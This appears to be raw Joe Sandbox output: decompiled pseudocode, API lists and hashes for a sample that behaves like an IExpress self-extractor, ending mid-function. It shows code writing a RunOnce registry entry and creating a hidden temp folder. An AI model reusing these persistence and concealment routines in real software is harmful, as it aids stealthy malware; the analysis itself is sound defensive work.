                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E00A92BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0xa9a288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0xa99124 = 0;
                                                                                                                                                                                                                                            				if(E00A92CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E00A92F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E00A952B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0xa98a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0xa99a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E00A91F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0xa98588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0xa99124; // 0x0
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A92C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00A96BB0,00A90000,00000000,00000002,0000000A), ref: 00A92C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 86706883d08b9b3eb560ee00a25cc52824c74ea29721219580c1cdd25e2a9aec
                                                                                                                                                                                                                                            • Instruction ID: c3084d0e2f996b7c77293d138436475bf63e07ca5546ba7a1a7f64fc9970671f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86706883d08b9b3eb560ee00a25cc52824c74ea29721219580c1cdd25e2a9aec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C11AC313012067BDF20ABF9AD89F6F37E9AB89391B05012BB901D7291DE31DC0287A5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A96F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00A96EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A96F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: e17c29d7a03c4d176120ea8a7d193f98cf91334f96c50d08cfde71e9d407d69b
                                                                                                                                                                                                                                            • Instruction ID: 170315c71201bf958f06280dc98a750d9ff9d8ab52585a099303385348cc0bd0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e17c29d7a03c4d176120ea8a7d193f98cf91334f96c50d08cfde71e9d407d69b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4090026435111057DA105BB09D1941575D16E5D642B915962A011C4494DF6044415552
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A9202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E00A96CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A9171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00A9658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xa99a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xa991e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xa991e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa991e5);
						if(_t90 != 0) {
							 *0xa98580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
							E00A9171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00A944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00A9658A( &_v268, 0x104, 0xa91140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0xa98530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                                                            0x00a92223
                                                                                                                                                                                                                                            0x00a92229
                                                                                                                                                                                                                                            0x00a9223d
                                                                                                                                                                                                                                            0x00a92249
                                                                                                                                                                                                                                            0x00a92250
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92250
                                                                                                                                                                                                                                            0x00a921d2
                                                                                                                                                                                                                                            0x00a921d9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a921d9
                                                                                                                                                                                                                                            0x00a9213a
                                                                                                                                                                                                                                            0x00a92141
                                                                                                                                                                                                                                            0x00a92144
                                                                                                                                                                                                                                            0x00a9214c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92163
                                                                                                                                                                                                                                            0x00a92172
                                                                                                                                                                                                                                            0x00a92172
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92163
                                                                                                                                                                                                                                            0x00a920ea
                                                                                                                                                                                                                                            0x00a920f0
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A92050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A9205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A9208C
                                                                                                                                                                                                                                              • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A920C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A920EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A92103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A92134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A9215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A9218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A921C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A921E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A9223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 178549006-2699677747
                                                                                                                                                                                                                                            • Opcode ID: 5b6fe9951d3711443b083a367e4ebcd9f18b1e5b39712b6bf8981ef9520e739f
                                                                                                                                                                                                                                            • Instruction ID: f841b6efb795bfe8219742bb1244300f354a4444d5ed182c06a81c93bb212e31
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b6fe9951d3711443b083a367e4ebcd9f18b1e5b39712b6bf8981ef9520e739f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C510775B00214BBDF20DBA4DC49FFB77BCEB55700F1002AAB909E6150DE759D4A8B90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 232 a955a0-a955d9 call a9468f LocalAlloc 235 a955db-a955f1 call a944b9 call a96285 232->235 236 a955fd-a9560c call a9468f 232->236 251 a955f6-a955f8 235->251 241 a9560e-a95630 call a944b9 LocalFree 236->241 242 a95632-a95643 lstrcmpA 236->242 241->251 245 a9564b-a95659 LocalFree 242->245 246 a95645 242->246 249 a9565b-a9565d 245->249 250 a95696-a9569c 245->250 246->245 254 a95669 249->254 255 a9565f-a95667 249->255 252 a9589f-a958b5 call a96517 250->252 253 a956a2-a956a8 250->253 256 a958b7-a958c7 call a96ce0 251->256 252->256 253->252 257 a956ae-a956c1 GetTempPathA 253->257 258 a9566b-a9567a call a95467 254->258 255->254 255->258 262 a956f3-a95711 call a91781 257->262 263 a956c3-a956c9 call a95467 257->263 270 a9589b-a9589d 258->270 271 a95680-a95691 call a944b9 258->271 275 a9586c-a95890 GetWindowsDirectoryA call a9597d 262->275 276 a95717-a95729 GetDriveTypeA 262->276 269 a956ce-a956d0 263->269 269->270 273 a956d6-a956df call a92630 269->273 270->256 271->251 273->262 288 a956e1-a956ed call a95467 273->288 275->262 289 a95896 275->289 280 a9572b-a9572e 276->280 281 a95730-a95740 GetFileAttributesA 276->281 280->281 282 a95742-a95745 280->282 281->282 283 a9577e-a9578f call a9597d 281->283 286 a9576b 282->286 287 a95747-a9574f 282->287 298 a95791-a9579e call a92630 283->298 299 a957b2-a957bf call a92630 283->299 291 a95771-a95779 286->291 287->291 292 a95751-a95753 287->292 288->262 288->270 289->270 296 a95864-a95866 291->296 292->291 295 a95755-a95762 call a96952 292->295 295->286 309 a95764-a95769 295->309 296->275 296->276 298->286 306 a957a0-a957b0 call a9597d 298->306 307 a957c1-a957cd GetWindowsDirectoryA 299->307 308 a957d3-a957f8 call a9658a GetFileAttributesA 299->308 306->286 306->299 307->308 314 
a9580a 308->314 315 a957fa-a95808 CreateDirectoryA 308->315 309->283 309->286 316 a9580d-a9580f 314->316 315->316 317 a95811-a95825 316->317 318 a95827-a9585c SetFileAttributesA call a91781 call a95467 316->318 317->296 318->270 323 a9585e 318->323 323->296
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A955A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E00A9468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E00A9468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0xa99a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0xa98b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0xa98a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E00A96517(_t82, 0x7d2, 0, E00A93210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa99a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0xa991e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0xa991e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E00A91781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E00A96952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E00A9597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E00A92630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E00A9658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0xa991e4;
                                                                                                                                                                                                                                            																					E00A91781(0xa991e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E00A95467(0xa991e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
